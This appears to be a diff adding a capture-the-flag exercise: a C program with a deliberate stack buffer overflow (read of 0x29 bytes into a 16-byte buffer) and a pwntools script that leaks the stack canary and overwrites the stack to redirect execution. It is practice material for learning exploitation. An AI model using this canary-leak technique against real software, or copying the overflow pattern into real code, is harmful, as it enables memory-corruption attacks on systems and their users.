canary/djCTF-1

canary/djCTF-1/answer.py

@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./djctf1')
+elf = ELF('./djctf1')
+#gdb.attach(p, "b pwnable\n b flag")
+
+# Canary Leak
+p.recvuntil("> ")
+p.sendline('0' * 0x18)
+p.recvuntil('0' * 0x18)
+canary_value = u64(p.recv(8)) - 0x0a
+print("Canary: " + hex(canary_value))
+
+# hijack control flow
+p.recvuntil("> ")
+#p.sendline('0' * 0x18 + p64(canary_value) + p64(0) + '\x00')
+p.sendline('0' * 0x18 + p64(canary_value) + p64(0))
+#time.sleep(10)
+p.interactive()

canary/djCTF-1/compile.sh

@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc djctf1.c -g -o djctf1

canary/djCTF-1/djctf1.c

@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+void pwnable();
+void init();
+__attribute__((aligned(0x100)))
+void flag(){
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    system("cat flag");
+    write(1, "Unbelieveable! You must be an experienced hacker!!\n", 51);
+    write(1, "That's your reward!!", 20);
+}
+int main(){
+    init();
+    write(1, "You are so lucky to have unlimited chance!!! xm!!!\n", 51);
+    while(1){
+        pwnable();
+    }
+}
+void init(){
+    setvbuf(stdout, 0LL, 2, 0LL);
+    setvbuf(stdin, 0LL, 2, 0LL);
+    setvbuf(stderr, 0LL, 2, 0LL);
+}
+void pwnable(){
+    char buf[0x10];
+    write(1, "> ", 2);
+    read(0, buf, 0x29);
+    write(1, "Let's check if you are successful. \n", 36);
+    puts(buf);
+    buf[0x18] = 0x00;
+}